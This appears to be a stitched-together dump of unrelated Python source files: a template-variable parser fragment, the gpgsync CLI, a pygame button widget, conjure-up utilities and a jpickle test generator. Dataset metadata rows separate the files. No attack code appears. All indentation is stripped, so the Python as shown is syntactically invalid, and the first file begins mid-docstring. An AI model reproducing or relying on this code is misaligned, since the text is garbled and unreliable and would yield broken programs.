Accept the input file and parse it by the prefix-postfix breaks. Someday might be able to change prefix,postfix,defaultDelim from input file, but not yet.
@ In, inputFiles, list, string list of input filenames that might need parsing.
@ In, prefix, string, optional, the string prefix to find input variables within the input files
@ In, postfix, string, optional, the string postfix signifying the end of an input variable within an input file
@ In, defaultDelim, string, optional, the string used between prefix and postfix to set default values
@ In, formatDelim, string, optional, the string used between prefix and postfix to set the format of the value
@ Out, None
"""
self.inputFiles = inputFiles
self.prefixKey=prefix
self.postfixKey=postfix
self.varPlaces = {} # varPlaces[var][inputFile]
self.defaults = {} # defaults[var][inputFile]
self.formats = {} # formats[var][inputFile]
self.acceptFormats = {"d":int,"e":float,"E":float,"f":float,"F":float,"g":float,"G":float}
self.segments = {} # segments[inputFile]
self.printTag = 'GENERIC_PARSER'
for inputFile in self.inputFiles:
infileName = inputFile.getFilename()#os.path.basename(inputFile)
self.segments[infileName] = []
if not os.path.exists(inputFile.getAbsFile()):
## Make sure to cast the inputFile to a string as it may be File object.
raise IOError('Input file not found: ' + str(inputFile))
seg = ''
lines = inputFile.readlines()
inputFile.close()
for line in lines:
while self.prefixKey in line and self.postfixKey in line:
self.segments[infileName].append(seg)
start = line.find(self.prefixKey)
end = line.find(self.postfixKey,start+1)
var = line[start+len(self.prefixKey):end]
if defaultDelim in var or formatDelim in var:
optionalPos = [None]*2
optionalPos[0], optionalPos[1] = var.find(defaultDelim), var.find(formatDelim)
if optionalPos[0] == -1:
optionalPos[0] = sys.maxsize
if optionalPos[1] == -1:
optionalPos[1] = sys.maxsize
defval = var[optionalPos[0]+1:min(optionalPos[1],len(var))] if optionalPos[0] < optionalPos[1] else var[min(optionalPos[0]+1,len(var)):len(var)]
varformat = var[min(optionalPos[1]+1,len(var)):len(var)] if optionalPos[0] < optionalPos[1] else var[optionalPos[1]+1:min(optionalPos[0],len(var))]
var = var[0:min(optionalPos)]
if var in self.defaults.keys() and optionalPos[0] != sys.maxsize:
print('multiple default values given for variable',var)
if var in self.formats.keys() and optionalPos[1] != sys.maxsize:
print('multiple format values given for variable',var)
#TODO allow the user to specify take-last or take-first?
if var not in self.defaults.keys() and optionalPos[0] != sys.maxsize:
self.defaults[var] = {}
if var not in self.formats.keys() and optionalPos[1] != sys.maxsize:
self.formats[var ] = {}
if optionalPos[0] != sys.maxsize:
self.defaults[var][infileName]=defval
if optionalPos[1] != sys.maxsize:
# check if the format is valid
if not any(formVal in varformat for formVal in self.acceptFormats.keys()):
try:
int(varformat)
except ValueError:
raise ValueError("the format specified for wildcard "+ line[start+len(self.prefixKey):end] +
" is unknown. Available are either a plain integer or the following "+" ".join(self.acceptFormats.keys()))
self.formats[var][infileName ]=varformat,int
else:
for formVal in self.acceptFormats.keys():
if formVal in varformat:
self.formats[var][infileName ]=varformat,self.acceptFormats[formVal]; break
self.segments[infileName].append(line[:start])
self.segments[infileName].append(var)
if var not in self.varPlaces.keys():
self.varPlaces[var] = {infileName:[len(self.segments[infileName])-1]}
elif infileName not in self.varPlaces[var].keys():
self.varPlaces[var][infileName]=[len(self.segments[infileName])-1]
else:
self.varPlaces[var][infileName].append(len(self.segments[infileName])-1)
#self.segments.append(line[end+1:])
line=line[end+1:]
seg = ''
else:
seg+=line
self.segments[infileName].append(seg)
def modifyInternalDictionary(self,**Kwargs):
"""
Edits the parsed file stored in self.segments to enter new variable values preparatory to a new run.
@ In, **Kwargs, dict, dict including SampledVars (the dictionary of variable:value to replace) and additionalEdits.
@ Out, None
"""
modDict = Kwargs['SampledVars']
self.adlDict = Kwargs.get('additionalEdits',{})
ioVars = []
for value in self.adlDict.values():
if type(value)==dict:
for k in value.keys():
ioVars.append(k)
elif type(value)==list:
for v in value:
ioVars.append(v)
else:
ioVars.append(value)
for var in self.varPlaces.keys():
for inputFile in self.segments.keys():
for place in self.varPlaces[var][inputFile] if inputFile in self.varPlaces[var].keys() else []:
if var in modDict.keys():
if var in self.formats.keys():
if inputFile in self.formats[var].keys():
if any(formVal in self.formats[var][inputFile][0] for formVal in self.acceptFormats.keys()):
formatstringc = "{:"+self.formats[var][inputFile][0].strip()+"}"
self.segments[inputFile][place] = formatstringc.format(self.formats[var][inputFile][1](modDict[var]))
else:
self.segments[inputFile][place] = _reprIfFloat(modDict[var]).strip().rjust(self.formats[var][inputFile][1](self.formats[var][inputFile][0]))
else:
self.segments[inputFile][place] = _reprIfFloat(modDict[var])
elif var in self.defaults.keys():
if var in self.formats.keys():
if inputFile in self.formats[var].keys():
if any(formVal in self.formats[var][inputFile][0] for formVal in self.acceptFormats.keys()):
formatstringc = "{:"+self.formats[var][inputFile][0].strip()+"}"
self.segments[inputFile][place] = formatstringc.format(self.formats[var][inputFile][1](self.defaults[var][inputFile]))
else:
self.segments[inputFile][place] = _reprIfFloat(self.defaults[var][inputFile]).strip().rjust(self.formats[var][inputFile][1](self.formats[var][inputFile][0]))
else:
self.segments[inputFile][place] = self.defaults[var][inputFile]
elif var in ioVars:
continue #this gets handled in writeNewInput
else:
raise IOError('Generic Parser: Variable '+var+' was not sampled and no default given!')
def writeNewInput(self,inFiles,origFiles):
"""
Generates a new input file with the existing parsed dictionary.
@ In, inFiles, list, Files list of new input files to return
@ In, origFiles, list, the original list of Files, used for key names
@ Out, None
"""
#get the right IO names put in
case = 'out~'+inFiles[0].getBase() #FIXME the first entry? This is bad! Forces order somewhere in input file
# however, I can't seem to generate an error with this, so maybe it's okay
def getFileWithExtension(fileList,ext):
"""
Just a script to get the file with extension ext from the fileList.
@ In, fileList, list, the Files list of files to pick from.
@ In, ext, string, the string extension that the desired filename ends with.
@ Out, None
"""
found=False
for index,inputFile in enumerate(fileList):
if inputFile.getExt() == ext:
found=True
break
if not found:
raise IOError('No InputFile with extension '+ext+' found!')
return index,inputFile
for var in self.varPlaces.keys():
for inputFile in self.segments.keys():
for place in self.varPlaces[var][inputFile] if inputFile in self.varPlaces[var].keys() else []:
for iotype,adlvar in self.adlDict.items():
if iotype=='output':
if var==self.adlDict[iotype]:
self.segments[inputFile][place] = case
break
elif iotype=='input':
if var in self.adlDict[iotype].keys():
self.segments[inputFile][place] = getFileWithExtension(inFiles,self.adlDict[iotype][var][0].strip('.'))[1].getAbsFile()
break
#now just write the files.
for f,inFile in enumerate(origFiles):
outfile = inFiles[f]
#if os.path.isfile(outfile.getAbsFile()): os.remove(outfile.getAbsFile())
outfile.open('w')
outfile.writelines(''.join(self.segments[inFile.getFilename()]))
outfile.close()
| apache-2.0 | -5,199,687,621,181,177,000 | 48.527523 | 175 | 0.630638 | false | 3.853319 | false | false | false |
firstlookmedia/gpgsync | gpgsync/cli.py | 1 | 4731 | # -*- coding: utf-8 -*-
"""
GPG Sync
Helps users have up-to-date public keys for everyone in their organization
https://github.com/firstlookmedia/gpgsync
Copyright (C) 2016 First Look Media
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import queue
import threading
import time
import sys
from .keylist import Keylist, RefresherMessageQueue
def worker(common, keylist, force, status):
"""
Sync a single keylist, to be run in a separate thread
"""
cancel_q = queue.Queue()
result = Keylist.refresh(common, cancel_q, keylist, force=force)
keylist.interpret_result(result)
status[keylist.id]['result'] = result
def sync(common, force=False):
"""
Sync all keylists.
"""
print("GPG Sync {}\n".format(common.version))
num_keylists = len(common.settings.keylists)
# Status is a dictionary where keys are the keylist "id", a
# concatenation of the keylist URL and fingerprint
status = {}
ids = [] # ordered list of ids
# Build the status object, and display keylist indexes
for i in range(num_keylists):
keylist = common.settings.keylists[i]
keylist.id = keylist.fingerprint + b':' + keylist.url
ids.append(keylist.id)
status[keylist.id] = {
"index": i,
"event": None,
"str": None,
"result": None,
"keylist": keylist
}
print("[{}] Keylist {}, with authority key {}".format(i, keylist.url.decode(), keylist.fingerprint.decode()))
print("")
# Start threads
threads = []
for keylist in common.settings.keylists:
keylist.q = RefresherMessageQueue()
t = threading.Thread(target=worker, args=(common, keylist, force, status,))
threads.append(t)
t.start()
# Monitor queues for updates
while True:
# Process the last event in the LIFO queues
for keylist in common.settings.keylists:
try:
event = keylist.q.get(False)
if event['status'] == RefresherMessageQueue.STATUS_IN_PROGRESS:
status[keylist.id]['event'] = event
except queue.Empty:
pass
# Display
for id in ids:
if not status[id]['event']:
status[id]['str'] = '[{0:d}] Syncing...'.format(status[id]['index'])
else:
percent = (status[id]['event']['current_key'] / status[id]['event']['total_keys']) * 100;
status[id]['str'] = '[{0:d}] {1:d}/{2:d} ({3:d}%)'.format(
status[id]['index'],
status[id]['event']['current_key'],
status[id]['event']['total_keys'],
int(percent))
sys.stdout.write('{} \r'.format(' '.join([status[id]['str'] for id in ids])))
# Are all keylists finished syncing?
done = True
for id in ids:
if not status[id]['result']:
done = False
break
if done:
sys.stdout.write('\n\n')
break
else:
# Wait a bit before checking for updates again
time.sleep(1)
# Make sure all threads are finished
for t in threads:
t.join()
# Display the results
for id in ids:
result = status[id]['result']
keylist = status[id]['keylist']
if result['type'] == 'success':
if keylist.warning:
print("[{0:d}] Sync successful. Warning: {1:s}".format(status[id]['index'], keylist.warning))
else:
print("[{0:d}] Sync successful.".format(status[id]['index']))
elif result['type'] == 'error':
print("[{0:d}] Sync failed. Error: {1:s}".format(status[id]['index'], keylist.error))
elif result['type'] == 'cancel':
print("[{0:d}] Sync canceled.".format(status[id]['index']))
elif result['type'] == 'skip':
print("[{0:d}] Sync skipped. (Use --force to force syncing.)".format(status[id]['index']))
else:
print("[{0:d}] Unknown problem with sync.".format(status[id]['index']))
| gpl-3.0 | 9,160,136,683,872,163,000 | 33.786765 | 117 | 0.581484 | false | 4.002538 | false | false | false |
MarkusHackspacher/PythonFarmGame | pygameui/button.py | 1 | 3351 | from __future__ import absolute_import
import os
import pygame
from pygameui.widget import Widget
buttonbgpath = os.path.join("images", "gui", "buttonbg.png")
class Button(Widget):
"""Button Widget
"""
def __init__(self, label, position, bgimage=None, labelsize=12,
color=(255, 255, 0)):
self.bgimage = bgimage
self.label = label
self.color = color
self.position = position
self.labelsize = labelsize
self.labelfont = pygame.font.Font("dejavusansmono.ttf", self.labelsize)
self.buttonbgorg = pygame.image.load(buttonbgpath).convert_alpha()
self.buttonbg = self.buttonbgorg.copy()
# Setup image
if not self.bgimage:
self._settextimage()
else:
self._setsize(self._calculate_size(self.bgimage))
Widget.__init__(self, self.position, self.width, self.height)
def _render_text(self):
"""_render_text
:return:
"""
img = self.labelfont.render(self.label, 0, self.color)
return img.convert_alpha()
@staticmethod
def _calculate_size(image):
"""_calculate_size
:param image:
:return:
"""
width = image.get_size()[0] + 4
height = image.get_size()[1]
return (width, height)
def _settextimage(self):
"""_set text image
:return:
"""
self.image = self._render_text()
self._setsize(self._calculate_size(self.image))
def setimage(self, newimage):
"""set image
:param newimage:
:return:
"""
self.image = newimage
self._setsize(self._calculate_size(self.image))
self.repaint()
def repaint(self):
"""repaint
:return:
"""
self.create_widget_image()
if self.label and self.bgimage:
img = self._render_text()
self.img.blit(img, (2, 0))
self.img.blit(self.bgimage, (0, 0))
elif not self.bgimage:
img = pygame.transform.smoothscale(self.buttonbgorg, self.size)
self.buttonbg = img
self.img.blit(self.buttonbg, (0, 0))
self.img.blit(self.image, (2, 0))
elif not self.label and self.bgimage:
self.img.blit(self.bgimage, (0, 0))
# draw rectangle on hover
if self.insidewidget:
pygame.draw.line(self.img, self.color, (1, self.height - 1),
(self.width, self.height - 1))
# mark modified
self.mark_modified()
def settext(self, newtext):
"""settext
:param newtext:
:return:
"""
self.label = newtext
self._settextimage()
self.repaint()
def poll_event(self, event):
"""poll_event
:param event:
:return:
"""
Widget.poll_event(self, event)
pos = self.parent.get_relative_mousepos()
# mouse button down
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1 and pos\
and self.pointinwidget(pos[0], pos[1]):
# on_click event
self.call_callback("clicked")
self.call_callback("onclick")
# make button active
if self.parent:
self.parent.makeactive(self)
| gpl-3.0 | -1,803,105,317,518,656,000 | 26.694215 | 79 | 0.547299 | false | 3.803632 | false | false | false |
Ubuntu-Solutions-Engineering/conjure | conjureup/utils.py | 1 | 23501 | import asyncio
import codecs
import errno
import json
import logging
import os
import pty
import re
import shutil
import socket
import subprocess
import sys
import uuid
from collections import Mapping
from contextlib import contextmanager
from functools import partial
from itertools import chain
from pathlib import Path
from subprocess import PIPE, Popen, check_call, check_output
import aiofiles
from pkg_resources import parse_version
from raven.processors import SanitizePasswordsProcessor
from termcolor import cprint
from conjureup import consts
from conjureup.app_config import app
from conjureup.models.metadata import SpellMetadata
from conjureup.telemetry import track_event
@contextmanager
def chdir(directory):
"""Change the current working directory to a different directory for a code
block and return the previous directory after the block exits. Useful to
run commands from a specificed directory.
:param str directory: The directory path to change to for this context.
"""
cur = os.getcwd()
try:
yield os.chdir(directory)
finally:
os.chdir(cur)
def run(cmd, **kwargs):
""" Compatibility function to support python 3.4
"""
try:
from subprocess import run as _run
return _run(cmd, **kwargs)
except ImportError:
if 'check' in kwargs:
del kwargs['check']
return check_call(cmd, **kwargs)
else:
return check_output(cmd, **kwargs)
def run_script(path, stderr=PIPE, stdout=PIPE):
return run(path, shell=True, stderr=stderr, stdout=stdout, env=app.env)
def run_attach(cmd, output_cb=None):
""" run command and attach output to cb
Arguments:
cmd: shell command
output_cb: where to display output
"""
stdoutmaster, stdoutslave = pty.openpty()
subproc = Popen(cmd, shell=True,
stdout=stdoutslave,
stderr=PIPE)
os.close(stdoutslave)
decoder = codecs.getincrementaldecoder('utf-8')()
def last_ten_lines(s):
chunk = s[-1500:]
lines = chunk.splitlines(True)
return ''.join(lines[-10:]).replace('\r', '')
decoded_output = ""
try:
while subproc.poll() is None:
try:
b = os.read(stdoutmaster, 512)
except OSError as e:
if e.errno != errno.EIO:
raise
break
else:
final = False
if not b:
final = True
decoded_chars = decoder.decode(b, final)
if decoded_chars is None:
continue
decoded_output += decoded_chars
if output_cb:
ls = last_ten_lines(decoded_output)
output_cb(ls)
if final:
break
finally:
os.close(stdoutmaster)
if subproc.poll() is None:
subproc.kill()
subproc.wait()
errors = [l.decode('utf-8') for l in subproc.stderr.readlines()]
if output_cb:
output_cb(last_ten_lines(decoded_output))
errors = ''.join(errors)
if subproc.returncode == 0:
return decoded_output.strip()
else:
raise Exception("Problem running {0} "
"{1}:{2}".format(cmd,
subproc.returncode))
async def arun(cmd, input=None, check=False, env=None, encoding='utf8',
stdin=PIPE, stdout=PIPE, stderr=PIPE, cb_stdout=None,
cb_stderr=None, **kwargs):
""" Run a command using asyncio.
If ``stdout`` or ``stderr`` are strings, they will be treated as filenames
and the data from the process will be written (streamed) to them. In this
case, ``cb_stdout`` and ``cb_stderr`` can be given as callbacks to call
with each line from the respective handle.
:param list cmd: List containing the command to run, plus any args.
:param dict **kwargs:
"""
env = dict(app.env, **(env or {}))
outf = None
errf = None
try:
if isinstance(stdout, str):
outf = await aiofiles.open(stdout, 'w')
stdout = PIPE
if isinstance(stderr, str):
errf = await aiofiles.open(stderr, 'w')
stderr = PIPE
proc = await asyncio.create_subprocess_exec(*cmd,
stdin=stdin,
stdout=stdout,
stderr=stderr,
env=env,
**kwargs)
data = {}
async def tstream(source_name, sink, ui_cb):
source = getattr(proc, source_name)
while proc.returncode is None:
async for line in source:
line = line.decode(encoding)
if ui_cb:
ui_cb(line)
data.setdefault(source_name, []).append(line)
if sink:
await sink.write(line)
await sink.flush()
await asyncio.sleep(0.01)
tasks = []
if input:
if isinstance(input, str):
input = input.encode(encoding)
tasks.append(proc._feed_stdin(input))
if proc.stdout:
tasks.append(tstream('stdout', outf, cb_stdout))
if proc.stderr:
tasks.append(tstream('stderr', errf, cb_stderr))
await asyncio.gather(*tasks)
await proc.wait()
finally:
if outf:
await outf.close()
if errf:
await errf.close()
stdout_data = ''.join(data.get('stdout', [])) if proc.stdout else None
stderr_data = ''.join(data.get('stderr', [])) if proc.stderr else None
if check and proc.returncode != 0:
raise subprocess.CalledProcessError(proc.returncode,
cmd, stdout_data, stderr_data)
return (proc.returncode, stdout_data, stderr_data)
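# Minimal usage sketch (added; the command shown is arbitrary):
#   rc, out, err = await arun(['echo', 'hello'], check=True)
# 'out' would contain 'hello\n'; passing a filename string as stdout/stderr
# additionally streams the output to that file line by line.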
def sentry_report(message=None, exc_info=None, tags=None, **kwargs):
app.loop.run_in_executor(None, partial(_sentry_report,
message, exc_info, tags, **kwargs))
def _sentry_report(message=None, exc_info=None, tags=None, **kwargs):
if app.no_report:
return
try:
default_tags = {
'spell': app.config.get('spell'),
'cloud_type': app.provider.cloud_type if app.provider else None,
'region': app.provider.region if app.provider else None,
'jaas': app.is_jaas,
'headless': app.headless,
'juju_version': juju_version()
}
if message is not None and exc_info is None:
event_type = 'raven.events.Message'
kwargs['message'] = message
if 'level' not in kwargs:
kwargs['level'] = logging.WARNING
else:
event_type = 'raven.events.Exception'
if exc_info is None or exc_info is True:
kwargs['exc_info'] = sys.exc_info()
else:
kwargs['exc_info'] = exc_info
if 'level' not in kwargs:
kwargs['level'] = logging.ERROR
kwargs['tags'] = dict(default_tags, **(tags or {}))
app.sentry.capture(event_type, **kwargs)
except Exception:
pass
async def can_sudo(password=None):
if not password and app.sudo_pass:
password = app.sudo_pass
if password:
opt = '-S' # stdin
password = '{}\n'.format(password).encode('utf8')
else:
opt = '-n' # non-interactive
proc = await asyncio.create_subprocess_exec('sudo', opt, '/bin/true',
stdin=subprocess.PIPE,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if password:
await proc.communicate(password)
else:
await proc.wait()
return proc.returncode == 0
def juju_version():
""" Get current Juju version
"""
cmd = run_script('{} version'.format(app.juju.bin_path))
if cmd.returncode == 0:
return parse_version(cmd.stdout.decode().strip())
else:
raise Exception("Could not determine Juju version.")
def snap_version():
""" Get snap version
"""
cmd = run_script('snap version')
if cmd.returncode == 0:
name_version_str = cmd.stdout.decode().splitlines()[0]
try:
name, version = name_version_str.split()
if '~' in version:
version, series = version.split('~')
return parse_version(version)
except:
raise Exception("Could not determine Snap version.")
def send_msg(msg, label, color, attrs=['bold']):
if app.conjurefile['color'] == 'auto':
colorized = sys.__stdout__.isatty()
elif app.conjurefile['color'] == 'always':
colorized = True
else:
colorized = False
if app.conjurefile['debug']:
print("[{}] {}".format(label, msg))
elif colorized:
cprint("[{}] ".format(label),
color,
attrs=attrs,
end="{}\n".format(msg), flush=True)
else:
print("[{}] {}".format(label, msg), flush=True)
def info(msg):
send_msg(msg, 'info', 'green')
def error(msg):
send_msg(msg, 'error', 'red')
def warning(msg):
send_msg(msg, 'warning', 'yellow')
def install_home():
""" returns installer user home
"""
return os.path.expanduser("~" + install_user())
def juju_path():
""" returns juju path for $user
"""
return os.getenv('JUJU_DATA',
os.path.expanduser('~/.local/share/juju'))
def mkdir(path):
if not os.path.isdir(path):
os.makedirs(path)
chown(path, install_user(), recursive=True)
def _normalize_bundle(original_bundle, overlay_bundle):
""" Normalizes top level application/services keys
"""
if 'applications' in original_bundle and 'services' in overlay_bundle:
overlay_bundle['applications'] = overlay_bundle.pop('services')
if 'services' in original_bundle and 'applications' in overlay_bundle:
overlay_bundle['services'] = overlay_bundle.pop('applications')
def merge_dicts(*dicts):
"""
Return a new dictionary that is the result of merging the arguments
together.
In case of conflicts, later arguments take precedence over earlier
arguments.
ref: http://stackoverflow.com/a/8795331/3170835
"""
updated = {}
# grab all keys
keys = set()
for d in dicts:
keys = keys.union(set(d))
for key in keys:
values = [d[key] for d in dicts if key in d]
# which ones are mapping types? (aka dict)
maps = [value for value in values if isinstance(value, Mapping)]
lists = [value for value in values if isinstance(value, (list, tuple))]
if maps:
# if we have any mapping types, call recursively to merge them
updated[key] = merge_dicts(*maps)
elif lists:
# if any values are lists, we want to merge them (non-recursively)
# first, ensure all values are lists
for i in range(len(values)):
if not isinstance(values[i], (list, tuple)):
values[i] = [values[i]]
# then, merge all of the lists into a single list
updated[key] = list(chain.from_iterable(values))
else:
# otherwise, just grab the last value we have, since later
# arguments take precedence over earlier arguments
updated[key] = values[-1]
return updated
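# Illustrative example (added, values hypothetical): later arguments win on
# conflicts, nested mappings merge recursively and list values are concatenated:
#   merge_dicts({'a': 1, 'b': {'x': 1}}, {'a': 2, 'b': {'y': 3}, 'c': [4]})
#   -> {'a': 2, 'b': {'x': 1, 'y': 3}, 'c': [4]}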
def subtract_dicts(*dicts):
"""
Return a new dictionary that is the result of subtracting each dict
from the previous. Except for mappings, the values of the subsequent
are ignored and simply all matching keys are removed. If the value is
a mapping, however, then only the keys from the sub-mapping are removed,
recursively.
"""
result = merge_dicts(dicts[0], {}) # make a deep copy
for d in dicts[1:]:
for key, value in d.items():
if key not in result:
continue
if isinstance(value, Mapping):
result[key] = subtract_dicts(result[key], value)
if not result[key]:
# we removed everything from the mapping,
# so remove the whole thing
del result[key]
elif isinstance(value, (list, tuple)):
if not isinstance(result[key], (list, tuple)):
# if the original value isn't a list, then remove it
# if it matches any of the values in the given list
if result[key] in value:
del result[key]
else:
# for lists, remove any matching items (non-recursively)
result[key] = [item
for item in result[key]
if item not in value]
if not result[key]:
# we removed everything from the list,
# so remove the whole thing
del result[key]
else:
del result[key]
return result
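# Illustrative example (added, values hypothetical): keys named in the second
# dict are removed from a copy of the first, recursing into nested mappings:
#   subtract_dicts({'a': 1, 'b': {'x': 1, 'y': 2}}, {'a': None, 'b': {'x': 0}})
#   -> {'b': {'y': 2}}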
def chown(path, user, group=None, recursive=False):
""" Change user/group ownership of file
Arguments:
path: path of file or directory
user: new owner username
group: new owner group name
recursive: set files/dirs recursively
"""
if group is None:
group = user
try:
if not recursive or os.path.isfile(path):
shutil.chown(path, user, group)
else:
for root, dirs, files in os.walk(path):
shutil.chown(root, user, group)
for item in dirs:
shutil.chown(os.path.join(root, item), user, group)
for item in files:
shutil.chown(os.path.join(root, item), user, group)
except OSError as e:
raise e
def spew(path, data, owner=None):
""" Writes data to path
Arguments:
path: path of file to write to
data: contents to write
owner: optional owner of file
"""
with open(path, 'w') as f:
f.write(data)
if owner:
try:
chown(path, owner)
except:
raise Exception(
"Unable to set ownership of {}".format(path))
def slurp(path):
""" Reads data from path
Arguments:
path: path of file
"""
try:
with path.open() as f:
return f.read().strip()
    except IOError:
        # re-raise the original error so the caller sees the real message
        raise
def install_user():
""" returns current user
"""
user = os.getenv('USER', None)
if user is None:
raise Exception("Unable to determine current user.")
return user
def set_chosen_spell(spell_name, spell_dir):
track_event("Spell Choice", spell_name, "")
app.env['CONJURE_UP_SPELL'] = spell_name
app.config.update({'spell-dir': spell_dir,
'spell': spell_name})
def set_spell_metadata():
app.metadata = SpellMetadata.load(
Path(app.config['spell-dir']) / 'metadata.yaml')
def get_spell_metadata(spell):
""" Returns metadata about spell
"""
metadata_path = Path(app.config['spells-dir']) / spell / 'metadata.yaml'
return SpellMetadata.load(metadata_path)
def __available_on_darwin(key):
""" Returns True if spell is available on macOS
"""
metadata = get_spell_metadata(key)
if metadata.cloud_whitelist \
and 'localhost' in metadata.cloud_whitelist:
return False
if metadata.spell_type == consts.spell_types.SNAP:
return False
return True
def find_spells():
""" Find spells, excluding localhost only and snap spells if not linux
"""
_spells = []
for category, cat_dict in app.spells_index.items():
for sd in cat_dict['spells']:
if is_darwin() and not __available_on_darwin(sd['key']):
continue
_spells.append((category, sd))
return _spells
def find_addons_matching(key):
if key in app.addons_aliases:
return app.addons_aliases[key]
return {}
def find_spells_matching(key):
if key in app.spells_index:
_spells = []
for sd in app.spells_index[key]['spells']:
if is_darwin() and not __available_on_darwin(sd['key']):
continue
_spells.append((key, sd))
return _spells
for category, d in app.spells_index.items():
for spell in d['spells']:
if spell['key'] == key:
if is_darwin() and not __available_on_darwin(spell['key']):
continue
return [(category, spell)]
return []
def get_options_whitelist(service_name):
"""returns list of whitelisted option names.
If there is no whitelist, returns []
"""
metadata = app.metadata
if metadata is None:
return []
options_whitelist = metadata.options_whitelist
if options_whitelist is None:
return []
svc_opts_whitelist = options_whitelist.get(service_name, [])
return svc_opts_whitelist
def gen_hash():
""" generates a UUID
"""
return str(uuid.uuid4()).split('-')[0][:3]
def gen_model():
""" generates a unique model name
"""
name = "conjure-{}".format(app.env['CONJURE_UP_SPELL'])
return "{}-{}".format(name[:24], gen_hash())
def gen_cloud():
""" generates a unique cloud
"""
name = "cloud-{}".format(app.provider.cloud_type)
return "{}-{}".format(name[:24], gen_hash())
def is_darwin():
""" Checks if host platform is macOS
"""
return sys.platform.startswith('darwin')
def is_linux():
""" Checks if host platform is linux
"""
return sys.platform.startswith('linux')
def is_valid_hostname(hostname):
""" Checks if a hostname is valid
Graciously taken from http://stackoverflow.com/a/2532344/3170835
"""
if len(hostname) > 255:
return False
if hostname[-1] == ".":
# strip exactly one dot from the right, if present
hostname = hostname[:-1]
allowed = re.compile(r"(?!-)[A-Z\d\-\_]{1,63}(?<!-)$", re.IGNORECASE)
return all(allowed.match(x) for x in hostname.split("."))
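# Hedged examples (editor's addition): the hostnames below are invented to
# illustrate the per-label rules enforced by is_valid_hostname above.
def _demo_is_valid_hostname():
    assert is_valid_hostname('maas-controller.example.com')
    # a label may not begin or end with a hyphen
    assert not is_valid_hostname('-bad-.example.com')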
def set_terminal_title(title):
""" Sets the terminal title
"""
sys.stdout.write("\x1b]2;{}\x07".format(title))
def get_physical_network_interfaces():
""" Returns a list of physical network interfaces
We whitelist eth due to some instances where users run
conjure-up inside a single LXD container. At that point
all devices are considered virtual and all network device
naming follows the ethX pattern.
"""
sys_class_net = Path('/sys/class/net')
devices = []
for device in sys_class_net.glob("*"):
parts = str(device.resolve()).split('/')
if "virtual" in parts and not parts[-1].startswith('eth'):
continue
try:
if not get_physical_network_ipaddr(device.name):
continue
except Exception:
continue
devices.append(device.name)
if len(devices) == 0:
raise Exception(
"Could not find a suitable physical network interface "
"to create a LXD bridge on. Please check your network "
"configuration.")
return sorted(devices)
def get_physical_network_ipaddr(iface):
""" Gets an IP Address for network device, ipv4 only
Arguments:
iface: interface to query
"""
out = run_script('ip addr show {}'.format(iface))
if out.returncode != 0:
raise Exception(
"Could not determine an IPv4 address for {}".format(iface))
app.log.debug("Parsing {} for IPv4 address".format(
out.stdout.decode('utf8')))
try:
ipv4_addr = out.stdout.decode(
'utf8').split('inet ')[1].split('/')[0]
except IndexError:
return None
return ipv4_addr
def get_open_port():
""" Gets an unused port
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
class IterQueue(asyncio.Queue):
"""
Queue subclass that supports the ``async for`` syntax.
When the producer is done adding items, it must call `close` to
notify the consumer.
Example::
queue = IterQueue()
async def consumer():
async for line in queue:
print(line)
async def producer():
with open('filename') as fp:
for line in fp:
await queue.put(line)
queue.close()
"""
def __init__(self, *args, **kwargs):
self.sentinal = []
super().__init__(*args, **kwargs)
def __aiter__(self):
return self
async def __anext__(self):
item = await self.get()
if item is self.sentinal:
raise StopAsyncIteration
return item
async def close(self):
await self.put(self.sentinal)
class SanitizeDataProcessor(SanitizePasswordsProcessor):
"""
Sanitize data sent to Sentry.
    Performs the same sanitizations as the SanitizePasswordsProcessor, but
also sanitizes values.
"""
def sanitize(self, key, value):
value = super().sanitize(key, value)
if value is None:
return value
def _check_str(s):
sl = s.lower()
for field in self.KEYS:
if field not in sl:
continue
if 'invalid' in s or 'error' in s:
return '***(contains invalid {})***'.format(field)
else:
return '***(contains {})***'.format(field)
return s
if isinstance(value, str):
# handle basic strings
value = _check_str(value)
elif isinstance(value, bytes):
# handle bytes
value = _check_str(value.decode('utf8', 'replace'))
elif isinstance(value, (list, tuple, set)):
# handle list-like
orig_type = type(value)
value = list(value)
for i, item in enumerate(value):
value[i] = self.sanitize(key, item)
value = orig_type(value)
elif isinstance(value, dict):
            # handle dicts (sanitize each entry against its own key)
            for sub_key, sub_value in list(value.items()):
                value[sub_key] = self.sanitize(sub_key, sub_value)
else:
# handle everything else by sanitizing its JSON encoding
# note that we don't want to use the JSON encoded value if it's
            # not being sanitized, because it will end up double-encoded
value_json = json.dumps(value)
sanitized = _check_str(value_json)
if sanitized != value_json:
value = sanitized
return value
class TestError(Exception):
def __init__(self):
super().__init__('This is a dummy error for testing reporting')
class SudoError(Exception):
pass
class UtilsHTTPError(Exception):
pass
| mit | 4,256,687,583,847,943,000 | 28.785805 | 79 | 0.562274 | false | 4.192864 | false | false | false |
jlaine/node-jpickle | test/genclass_test.py | 1 | 4122 | #!/usr/bin/python
from __future__ import print_function
import pickle
import binascii
class MyClass:
def __init__(self):
self.data = "test"
class MyOtherClass:
def __init__(self):
self.myclass = MyClass()
self.myclasses = [ MyClass(), MyClass() ]
self.myclasses[0].data = "new test value"
class MySubClass(MyOtherClass):
def __init__(self):
MyOtherClass.__init__(self)
self.subvalue = 12
myclass = MyClass()
myclassescontainer = { "myclass1" : MyClass(), "myclass2" : MyClass() }
myclassescontainer["myclass1"].data = "new test value 1"
myclassescontainer["myclass2"].data = "new test value 2"
myotherclass = MyOtherClass()
mysubclass = MySubClass()
testfile = open("./class_tests.js", "w")
print("var assert = require('assert'),\n" \
" util = require('util'),\n" \
" jpickle = require('../lib/jpickle');\n\n", file = testfile )
print("function MyClass() {\n" \
"}\n\n", file = testfile )
print("function MyOtherClass() {\n" \
" this.mymethod = function() { return this.myclass.data + ' foo!';}; \n" \
"}\n\n", file = testfile )
print("function MySubClass() {\n" \
"}\n" \
"util.inherits(MySubClass, MyOtherClass);\n\n", file = testfile )
